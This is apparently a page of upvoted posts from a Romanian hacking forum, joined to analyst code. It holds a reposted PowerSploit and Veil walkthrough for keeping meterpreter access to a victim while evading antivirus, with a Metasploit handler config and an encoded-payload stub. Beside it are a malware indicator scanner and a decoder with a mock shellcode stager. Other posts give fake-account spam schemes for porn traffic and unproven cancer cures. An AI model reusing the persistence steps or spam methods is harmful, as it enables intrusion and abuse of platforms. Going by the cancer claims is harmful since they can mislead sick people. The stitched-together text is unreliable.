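     "sha256": "1CEA4E49BD785378D8BEB863BB8EB662042DFFD18C85B8C14C74A0367071D9A7"},
    {"type": "file", "path": APPDATA + r"\Intel\tyeu.dat", "sha256": "d" * 64},
    {"type": "file", "path": r"C:\Windows\System32\notepad.exe", "sha256": "0" * 64},
    {"type": "registry", "key": RUN_KEY, "name": "update",
     "data": r"c:\windows\system32\rundll32.exe " + APPDATA + r"\Intel\ResN32.dll Run"},
    {"type": "registry", "key": APPINIT_KEY, "name": "AppInit_DLLs",
     "data": APPDATA + r"\Intel\ResN32.dll"},
    {"type": "registry", "key": APPINIT_KEY, "name": "LoadAppInit_DLLs", "data": 1},
    {"type": "mutex", "name": r"Global\deletethread"},
    {"type": "netconn", "dst_ip": "198.55.120.143", "dst_port": 8080},
    {"type": "netconn", "dst_ip": "8.8.8.8", "dst_port": 53},
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"{rule:13} {detail}")
```

The hash check catches only unchanged binaries; the staging-path and persistence checks are what survive recompilation of the loader, and the mutex check needs a live-process enumerator rather than a disk sweep.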
  6. You start making films, it's very good to have unique content :)))
    2 points
  7. Free method: web host and subdomain (you can use a domain if you have one) from easyxsites; to convert the traffic we use plugrush and imagetwist. Traffic methods: A) 000webhost + wordpress + wprobot + nextscripts configured to post on vbulletin one picture at a time with an href to your site + you can also use tumblr and other services (don't forget to add hashtags for the other services). B) Spam on the imagefap chat (directly with your site, or upload watermarked images and post them on their chats); for email addresses use yopmail.com. C) Fake Facebook account with a hot girl, join Facebook groups and post pictures with "add me", collect lots of friends/followers and convert the account into a page. D) Keep trying the methods above. E) Search Google for "milf tumblr.com" (or any other keyword), make a list of the sites you find and append /rss at the end (e.g. muie.tumblr.com/rss) + make a blog on tumblr, e.g. "milf next door" (be as unique as possible). Next step, an account on https://ifttt.com/ where we make recipes with rss + tumblr, add the list of rss feeds made above + put hashtags related to the niche and, in the description, of course, a link to our site. Links: https://www.plugrush.com/?ref=20013 (ref) easyXsites - Your Free Adult Host (non ref) ImageTwist - Free Image Hosting, Photo sharing & Earn Money (non ref) https://www.plugrush.com (non ref) Short and simple: search Google for other porn sites to see how other people promote their sites and do the same thing. Links that can help you: http://www.blackhatworld.com/blackhat-seo/making-money/747458-methods-getting-targetted-visitors-your-adult-cpa-site-traffic-sources.html http://www.blackhatworld.com/blackhat-seo/making-money/801786-method-my-webcam-method-making-600-month.html
    1 point
  8. They're all here: https://shop.sitepoint.com/ But the ones most relevant to the forum's theme are: https://shop.sitepoint.com/sales/it-security-and-ethical-hacking https://shop.sitepoint.com/sales/pay-what-you-want-white-hat-hacker-bundle https://shop.sitepoint.com/sales/cyber-security-bundle https://shop.sitepoint.com/sales/datacenters-penetration-testing-bundle https://shop.sitepoint.com/sales/zenmate-lifetime-subscription
    1 point
  9. Free SIM cards from Lycamobile. Each card has €1 of credit that can be used for 30 days. Rates: http://www.lycamobile.ro/ro/internationalrates I ordered a card too; it arrived in 3 days by post. Link to order a card: http://www.lycamobile.ro/ro/free-sim-request It has coverage across the whole country and cheap calls abroad.
    1 point
  10. Everything shows up on your site; first of all you need to see how an online shop works... There are many platforms; at first I worked with Drupal, then OpenCart, but I came to the conclusion that I don't need more than wordpress + woocommerce. Search for wordpress + woocommerce tutorials and you'll find them. The card number isn't stored on your side... but at the provider where the payment is made, e.g. paypal.
    1 point
  11. Leaving the promotion aside, it's very useful for those who want to call abroad and, as far as I know, it can also be used in other countries (I don't know under what conditions/rates).
    1 point
  12. @sleed for breast cancer a cure was invented in Cuba, it costs $1 there. Besides what alexu listed, turmeric is also good. Give up meat completely. From very many studies and case examples that appear more and more often online, cannabis oil is extraordinary. Lemongrass, dandelion.
    1 point
  13. @sleed I bought him many things and not just from one place. I'm writing them here, maybe they're useful for others too, and so that I don't forget what I bought him, just as I forgot even now to mention the bitter apricot kernels. BioGreens, coconut oil, sea buckthorn and other things I got from Farmacia Tei, because they have the lowest prices online and offline. Often they have lower prices even than buying directly from the producer. For example, at the producer BioGreens costs 99 lei, while at FT it's 77.5. On two boxes I saved 43 lei. A box of Hepatoprotect Forte costs 16 lei at the pharmacy next to me, and at FT only 8 lei. For the things I bought him last time from FT I paid 415 lei, and if I had bought them from regular shops I think I'd have paid almost double. OxyE - a supplement for cell oxygenation - I got from the USA, from Amazon (the pack of 5), because it wasn't in stock in Europe. Bitter apricot kernels (for Vitamin B17) I got from driedfruits.ro. The people there are very nice, because no matter how much I buy, they always send a gift as well. From there I also got aloe vera + blueberries. Vitamin C 1000 + Zn - Dr Hart - very good quality Vitamin C, from the Punkt pharmacy, because I find it there and it has the lowest price (11 lei and something). The water alkalinization device - hunza.ro. Some agree with it, others don't. I say it does him good and is an important element in the fight against cancer. Air purifier (ionizer) - I got it from famtastic.ro. Even though it came from abroad, it still cost less than what I could find here. It has been running non-stop since I bought it for him, it's reliable (German), doesn't use much power and isn't noisy. Other than that, lots of fruit (pomegranates, lemons, grapefruit) and vegetables (broccoli). All of these for alkalinizing the body, for oxygenating the blood, because cancer cannot exist in an alkaline environment, as Otto Warburg, Nobel Prize winner, said.
Someone else asked me in private to make a list of everything I bought him, but, just like then, I'm sure I've left out some things, because I don't remember them all. I hope it's useful to you and that your relative gets well. If you have questions, you can write to me in private.
    1 point
  14. @alexu, if I may ask, could you please recommend a shop where you bought the products? I also have someone in my family who has breast cancer and I want to recommend them to her...
    1 point
  15. Today he had another radiotherapy session, as he does every day, except weekends and the times when that machine breaks down, because it has broken a few times already. He has about seven more sessions. I thought 25 was a lot, but today I talked to a man who was also there for treatment and he had 75 to do. That man didn't look well at all, he probably had something even more serious. Dad is still doing fine, apart from the moments when the cytostatics make him nauseous, and his stomach is slightly upset from the radiation. His hair has also started to fall out, but that's not a big problem. A relative from the provinces came to visit us and couldn't believe how well he looked. She expected him to be much worse, especially since she had told us that someone or other died two months after colon cancer surgery. Of course he's fine, because I stuff him every day with a lot of good things, bought with your help. Speaking of good things: I'm sorry that everything I wrote since January has disappeared because you changed the platform (which looks good), because maybe some of those things were useful to others in a similar situation. Two important things for cancer patients, which I got for my father: 1. Coconut oil, about which researchers at the University of Adelaide claim that, in laboratory tests, it killed 93% of colon cancer cells in two days. At first I put it in his sleep tea, but he didn't like it, so now I put two teaspoons, every day, on a slice of good bread (without E-numbers or preservatives). 2. BioGreens, because wheatgrass, they say, "Reduces the toxicity associated with radiation and chemotherapy". I put a sachet in a large mug (350 ml) of concentrated sea buckthorn tea. Besides all this, I keep giving him OxyE (he has started the third tube), alkaline water, Omega 3,6,9, fruit.
Thanks to the things above he feels and looks well, because otherwise the radiation and the chemicals would have destroyed him, especially since he was badly weakened after the two major operations. Speaking of operations: they're healing well. The one on the right lung is a cut of about 10 cm, under the armpit, but it's small compared with the colon operation. I hope he finishes radiotherapy and I hope he finishes with those strong chemicals too. Five months after the start of the treatment he'll have another CT scan, i.e. around March. Then, I hope they say he's fine and doesn't need any more treatment of any kind. And that he should continue with these natural things.
    1 point
  16. Outlook Password Decryptor

Outlook stores the password for subsequent logins when the user selects the 'Remember Password' option during authentication. The password is stored in encrypted format and only the respective user can decrypt it. Outlook Password Decryptor can instantly decrypt and recover all these account passwords. For a command-line version, check out our new tool, Outlook Password Dump.

Note: Outlook Password Decryptor is not a hacking or cracking tool, as it can only help you recover your own lost password that was previously stored on your system.

Outlook Password Decryptor can recover passwords from all versions, beginning with Outlook Express up to the latest version, Outlook 2015. It works on a wide range of platforms, starting from Windows XP up to the new Windows 10 version.

Features
Outlook Password Decryptor is the all-in-one tool to recover passwords from all versions of Outlook. It can also decrypt passwords from the different types of email account configurations supported by Outlook, such as:
Exchange Server
IMAP
POP3
SMTP
LDAP
HTTP
On starting, it automatically detects the current Outlook version along with user and platform information. It also provides an option to save the recovered password list to an HTML/TEXT/XML/CSV file for future use.

Link: http://securityxploded.com/outlookpassworddecryptor.php
    1 point
  17. How-To: Post-Ex Persistence Scripting with PowerSploit & Veil

Many penetration testers within the security industry state that getting a system shell is just the starting point for an attack. Sure, I agree, and quite possibly the most significant tenet of our craft is post-exploitation: specifically, the act of maintaining a persistent connection while remaining intimately covert against defense mechanisms. Historically, the act of evading antivirus and/or malware detection has been a perpetual struggle between those that detect and those that evade. We could use code packing, obfuscation and staged multipart network-I/O-based payloads, to name a few.

Enter Microsoft, as they tipped the scales in favor of the evaders by introducing the PowerShell scripting language. The PowerShell language was first introduced as version 1.0 with the advent of Microsoft XP SP2/SP3. Additionally, the PowerShell scripting language, although full-featured, is considered a whitelisted application for the purpose of running various local and/or network-based functions; therefore, it remains undetected by antivirus software.

A number of well-authored PowerShell tutorials exist on the Internet, providing everything necessary to get underway rather quickly. However, although I vehemently support the pedantic study of programming languages, we don't really need to touch code to establish an effective piece of PowerShell. To further prove the point, this is a quick post to simply document the steps needed to create a persistent PowerShell communication channel using both the PowerSploit and Veil frameworks. This technique will leverage Veil to generate a PowerShell-encoded meterpreter payload. Immediately following, the PowerSploit framework will be used to create a PowerShell wrapper that can be executed on the victim machine in order to maintain the persistent connection.

Further information regarding the frameworks used within this post can be referenced here:
PowerSploit: https://github.com/mattifestation/PowerSploit
Veil: https://github.com/veil-evasion/Veil

I would also like to thank my colleague, Dan Kottmann, for his assistance and expertise while debugging code/execution gremlins.

Lab Environment

The lab environment used to stage this exploitation scenario was comprised of the following three systems, all of which were virtualized guests running within an Ubuntu 12.04 (64-bit) host system.
Kali Linux (32-bit) – Attacking System #1 (Primary)
Windows 7 (64-bit) – Attacking System #2 (Supporting)
Windows 7 (32-bit) – Victim System

Additionally, the following diagram illustrates the network architecture and the progression of the attack sequence. The procedure takes into consideration that you have already gained an initial meterpreter shell on the victim system and that we are proceeding with post-exploitation from this point on.
First Step – Create the meterpreter payload using Veil.
Second Step – Place the Veil payload into PowerSploit and generate the new payload.
Third Step – Use the existing meterpreter session to upload the new PowerShell script.
Fourth Step – Relax and enjoy the persistent connection.

Installing Veil

The easiest method to install the Veil framework is to simply perform a "git clone" from Chris Truncer's GitHub code repository within a Kali Linux operating system. There are specific installation details on his GitHub site, but essentially he provides a "setup.py" script that will install the necessary dependencies. A successfully installed instance of the Veil framework should return something similar to the following screenshot upon typing:
    python /usr/share/veil/Veil.py

Installing PowerSploit

The next step is to download the PowerSploit archive from the GitHub code repository and install it within the Microsoft Windows 7 (64-bit) attacking system. The following series of commands provides the details for installing the framework. Note that we will need administrative privileges for the following steps.

Get the value of the "PSModulePath" environment variable:
    C:\Users\labrat>set
    ----
    PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\

Decompress the downloaded PowerSploit archive and place it in the previously identified PowerShell Modules directory:
    C:\Windows\System32\WindowsPowerShell\v1.0\Modules>move C:\Users\labrat\Downloads\PowerSploit-master .
            1 dir(s) moved.
    C:\Windows\System32\WindowsPowerShell\v1.0\Modules>dir
     Volume in drive C has no label.
     Volume Serial Number is 0CA4-867A
     Directory of C:\Windows\System32\WindowsPowerShell\v1.0\Modules
    12/04/2013  11:24 AM    <DIR>          .
    12/04/2013  11:24 AM    <DIR>          ..
    12/04/2013  11:18 AM    <DIR>          PowerSploit-master
    07/14/2009  12:32 AM    <DIR>          PSDiagnostics
    07/14/2009  12:37 AM    <DIR>          TroubleshootingPack
                   0 File(s)              0 bytes
                   5 Dir(s)  12,084,989,952 bytes free

Enter the PowerShell scripting environment and set the execution policy to "Unrestricted" so that we can execute our PowerSploit scripts:
    C:\Users\labrat>powershell
    Windows PowerShell
    Copyright (C) 2009 Microsoft Corporation. All rights reserved.
    PS C:\Users\labrat>
    PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules> Set-ExecutionPolicy Unrestricted

Finally, import the PowerSploit "Persistence" module and answer "Run" if prompted with a warning:
    PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Import-Module .\Persistence
    Security Warning
    Run only scripts that you trust. While scripts from the Internet can be useful, this script can potentially harm your computer. Do you want to run C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence\Persistence.psm1?
    [D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R
    ----

Generating the Veil Payload

The following series of screenshots provides the details to generate a .bat script containing an embedded Base64-encoded PowerShell meterpreter payload. The windows/meterpreter/reverse_https payload was used during this scenario, considering it offers an inherent level of persistence in and of itself while also increasing the probability that an HTTP-based payload will be allowed outbound. Also note that the powershell/VirtualAlloc method is used, as it allows for inline shellcode injection.

Finally, we are presented with the .bat file containing the Base64-encoded payloads applicable to both 32- and 64-bit architectures. We need to copy out the entire Base64 value to be used later within PowerSploit. Note that we obviously don't care which of the Base64 values we copy, since both of the payloads are identical. The wrapper shell script is simply providing the conditional required to identify the architecture type.

Generating the PowerSploit Payload

This section is based on Matt Graeber's PowerSploit article and is well worth the read. The motivation for providing this blog post was to illustrate how to leverage the inclusion of Veil payloads in conjunction with Matt's technique.

Getting back on task, on the Windows 7 (64-bit) system, we need to ensure that we are still in the PowerShell scripting environment. Again, we can enter the environment by typing the following within a privileged command shell and change directory to the location of the PowerShell modules:
    C:\Users\labrat>powershell
    Windows PowerShell
    Copyright (C) 2009 Microsoft Corporation. All rights reserved.
    PS C:\Users\labrat>
    PS C:\Users\labrat> cd C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master
    PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master>

Now we can create an arbitrary variable and assign the necessary value to it. The following example provides a stub for a variable assignment that can be used by simply plugging in our previously copied Base64 Veil payload:
    $p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("VEIL_PAYLOAD_HERE")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()}

The following uses our Veil payload and represents an actual assignment.

We can now set a couple of additional arbitrary variable values that will define both non-privileged and privileged persistence methods, respectively. The first definition will run the persistence script upon each successful logon. The second, considering we have gained privileged access to the victim system, will run the persistence script each day at 10:00 AM.
    $u = New-UserPersistenceOptions -Registry -AtLogon
    $e = New-ElevatedPersistenceOptions -ScheduledTask -Daily -At '10:00 AM'

Finally, we need to generate the persistence script using the PowerSploit "Add-Persistence" module:
    PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> Add-Persistence -ScriptBlock $p -UserPersistenceOptions $u -ElevatedPersistenceOptions $e -Verbose -PassThru

This should generate two files output to the same directory. The Persistence.ps1 and RemovePersistence.ps1 files should be self-explanatory: they are simply used to enable persistence and remove persistence.
    PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> ls
        Directory: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence
    Mode   LastWriteTime        Length Name
    ----   -------------        ------ ----
    -a---  12/4/2013 11:19 AM    16025 Add-Persistence.ps1
    -a---  12/4/2013 11:19 AM     5140 New-ElevatedPersistenceOptions.ps1
    -a---  12/4/2013 11:19 AM     3555 New-UserPersistenceOptions.ps1
    -a---  12/4/2013  5:29 PM     7128 Persistence.ps1
    -a---  12/4/2013 11:19 AM     1104 Persistence.psd1
    -a---  12/4/2013 11:19 AM      170 Persistence.psm1
    -a---  12/4/2013  5:29 PM      514 RemovePersistence.ps1
    -a---  12/4/2013 11:19 AM      583 Usage.md

Profit

After all of this, we are set to actually profit from our effort. At this point, the victim system is in a state of initial exploitation, as the following screenshot illustrates. We now need to upload our newly generated PowerShell script so that we can maintain persistence. Similar to what we did on the Windows 7 (64-bit) system, we need to ensure that the victim machine can run PowerShell scripts by explicitly defining the Set-ExecutionPolicy Unrestricted policy. However, if we drop into a command shell from within meterpreter, then the only available shell is non-interactive. Fortunately, Microsoft has afforded us the ability to set the policy using a non-interactive method from within the command line.

A word of mention: we are using a separate multi/handler during these examples, as opposed to the inherent handler invoked for a specific exploit payload. The following configuration was used within a Metasploit resource script and started from the msfconsole as follows. Save this to a file called reversehttps.rc:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_https
    set LHOST 0.0.0.0
    set LPORT 8443
    set ExitOnSession false
    exploit -j -z

Invoke the script using:
    msfconsole -r reversehttps.rc

Returning to the example, we can now move our new Persistence.ps1 script from the Windows 7 (64-bit) system over to the Kali Linux system. Then we will use the post-exploitation exec_powershell module to upload our Persistence.ps1 script via the existing meterpreter session, as the following screenshot illustrates. The successful execution of Persistence.ps1 should complete cleanly without returning any syntax errors.

Note that the following screenshot returned multiple meterpreter sessions, since the Windows 7 (32-bit) victim system was rebooted and logged back into. Furthermore, there were multiple instances of the persistence script staged on the victim, resulting in the persistent connections. If everything worked correctly, persistence should be working as expected. You can obviously test this in a controlled environment by re-authenticating the victim user, which should invoke a new meterpreter session.

The process of removing persistence is as simple as copying the RemovePersistence.ps1 script from the Windows 7 (64-bit) system to the Kali Linux system and running the script using the Metasploit exec_powershell module.

Contact info: Chris Patten
Source: https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil
    1 point
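The $p stub in the post above is the whole encoding scheme: Base64, then a .NET DeflateStream, then ASCII text handed to iex. An analyst who pulls that stub out of a Run key, an AppInit entry or a scheduled task needs the inverse. The script below is an added example, not code from the post, from PowerSploit or from Veil: pack_powershell() reproduces the wrapping so the round trip can be tested, decode_scriptblock() reverses it on stub text shaped like the one on the page, and triage() pulls the cheap indicators (injection APIs, IPv4:port) out of the recovered script. .NET DeflateStream is raw DEFLATE with no zlib header, which is why wbits is -15 on both sides. The stager text is constructed and does nothing on its own; 10.0.0.5:8443 is a made-up lab address.

```python
"""Pack and unpack the Base64 + DeflateStream wrapper used by the $p stub above.

Added example, not code from the post, PowerSploit or Veil. SAMPLE_STAGER
is constructed text (it is never executed) and 10.0.0.5:8443 is made up.
"""
import base64
import re
import zlib

RAW_DEFLATE = -15  # negative wbits: raw DEFLATE, no zlib header, like .NET DeflateStream


def pack_powershell(script: str) -> str:
    """Deflate + Base64 a script the way the page's $p stub expects to unpack it."""
    comp = zlib.compressobj(9, zlib.DEFLATED, RAW_DEFLATE)
    raw = comp.compress(script.encode("ascii")) + comp.flush()
    return base64.b64encode(raw).decode("ascii")


def unpack_powershell(blob: str) -> str:
    """Inverse of pack_powershell(): Base64 -> raw inflate -> ASCII text."""
    return zlib.decompress(base64.b64decode(blob), RAW_DEFLATE).decode("ascii")


def encode_command(script: str) -> str:
    """powershell -EncodedCommand blobs are UTF-16LE Base64, not deflated."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


_B64_ARG = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def extract_blob(scriptblock_text: str) -> str:
    """Pull the Base64 argument out of a $p = {iex ... FromBase64String("...")} stub."""
    m = _B64_ARG.search(scriptblock_text)
    if not m:
        raise ValueError("no FromBase64String(...) argument found")
    return m.group(1)


def decode_scriptblock(scriptblock_text: str) -> str:
    return unpack_powershell(extract_blob(scriptblock_text))


# Stub text copied from the post, with the payload slot turned into a format field.
STUB_TEMPLATE = (
    '$p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream '
    '($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("%s")))), '
    '[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()}'
)


def build_stub(script: str) -> str:
    return STUB_TEMPLATE % pack_powershell(script)


API_MARKERS = ("VirtualAlloc", "CreateThread", "DownloadString", "Invoke-Expression", "iex")
_ENDPOINT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")


def triage(script: str) -> dict:
    """Cheap indicators from a recovered script: injection APIs and IPv4:port strings."""
    low = script.lower()
    return {
        "markers": [m for m in API_MARKERS if m.lower() in low],
        "endpoints": sorted(set(_ENDPOINT.findall(script))),
    }


# Constructed stand-in for a VirtualAlloc-style stager; text only, never run.
SAMPLE_STAGER = """\
# constructed stand-in for a Veil VirtualAlloc stager; it is text only
$sc = [Byte[]](0x90,0x90,0x90,0xC3)
$mem = [Win32]::VirtualAlloc(0, $sc.Length, 0x3000, 0x40)
[Runtime.InteropServices.Marshal]::Copy($sc, 0, $mem, $sc.Length)
$t = [Win32]::CreateThread(0, 0, $mem, 0, 0, 0)
# callback: 10.0.0.5:8443
"""

if __name__ == "__main__":
    stub = build_stub(SAMPLE_STAGER)
    print(stub[:120] + "...")
    recovered = decode_scriptblock(stub)
    print(recovered)
    print(triage(recovered))
```

If zlib.decompress raises "invalid stored block lengths" or similar, the blob was not deflated at all: try decode_encoded_command() first, since a -EncodedCommand argument is the other wrapper you will meet in the same Run keys and scheduled tasks.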
  18. It's not worth it, you'll get banned on facebook very quickly.
    1 point
  19. You check whether the user has adblock in the browser, and from there you redirect them wherever you want. And the $$$$ come from affiliate programs, although there's little chance of getting conversions from tube traffic. I've used chaturbate and awempire and they're fine. And for ads, popads / plugrush. Embed from the big porn sites (redtube, ...). Hi, please delete your referral links.
    1 point
  20. It exists per category. Look at the bottom right when you enter a category. There isn't one for the whole forum; I told them, but it'll take a while until they add it, if they add it at all. I was thinking of making one myself, but I really don't have the time or the inclination...
    1 point
  21. The only method, though it isn't 100% safe, is to find the folder where you installed samp, select it, press shift+delete and then ENTER immediately. I know someone (askwrite) who played metin2 and the method worked for him.
    1 point
  22. Can you please post like a normal human being? Maybe in India people like all the flashy colours, sizes and fonts but here it's not India.
    1 point
  23. @rectisor To put in as little effort as possible, watch your neighbour when he leaves home and break down his door, it's easier for you that way
    1 point
  24. That's not the point; the point is that online sales are at most 15%, the rest is in physical stores, mate; the peasants who buy on instalments want to touch the product, etc. etc. We still have a long way to go before we get educated too.
    -1 points
  25. This is what you wanted, this is what you spoiled yourselves with, with PUIE MONTA and all the manipulations on facebook, and now CIOLANU dacian ciolos and the German KLAUS from the PNL have screwed you; now you eat only CIOLOS without meat, smoked, on a keychain, and the Germans send you this:
    -1 points
  26. Shell Uploading Best Methods Tutorials - By Spirit. Hello guys, I am Spirited Wolf and today I am here to give a tutorial on shell uploading and bypasses in different scenarios. Hope you will like it. And please subscribe to my channel to get notifications of upcoming tutorials. Upload a shell after doing SQLi - By Spirit. Uploading a shell with an SQLi command - By Spirit. Advanced way to upload your shell tutorial - By Spirit. Bypass file (mostly shell) upload tutorial - By Spirit. ------------------------------------------------------------------------------------------------------------ This tutorial is for educational purposes only. I am not responsible for any harm. ------------------------------------------------------------------------------------------------------------ Use your skills to protect others, not to harm. Thanks for watching guys and keep watching Pentesting with Spirit. Our YouTube channel link: https://www.youtube.com/c/Pentestingwithspirit Facebook page link: http://facebook.com/Pentest.with.spirit1 Twitter account: @spirit3113
    -1 points
  27. Nonsense, the reputation system is perverse and we no longer have 'Mata-i grasa', plus several other disadvantages; still, let's hope it ends up like before, but frankly I'd rather have an RST backup than an extreamcs atmosphere... And yet... where did our 'Mata-i grasa' disappear to? PS: If we're staying on ipb anyway, at least implement a hide/show for that sidebar on the right with topics and posts... PS: Pfff... don't forget the ranks
    -1 points
  28. Last week I registered 2 domains + hosting and didn't send anything, but I had an Italian IP and phone number
    -1 points
  29. Do you have premium? And does it work? Because I don't think it's possible for some crappy plugin to get past facebook's spam protection; I don't think it sends more than 100-200 messages an hour // not even the free like function works; it doesn't give likes properly, it only gives some, you refresh and after a while those disappear too. It looks like you were misusing this feature by going too fast. You've been blocked from using it. Learn more about blocks in the ... If you think you're seeing this by mistake, please ....
    -1 points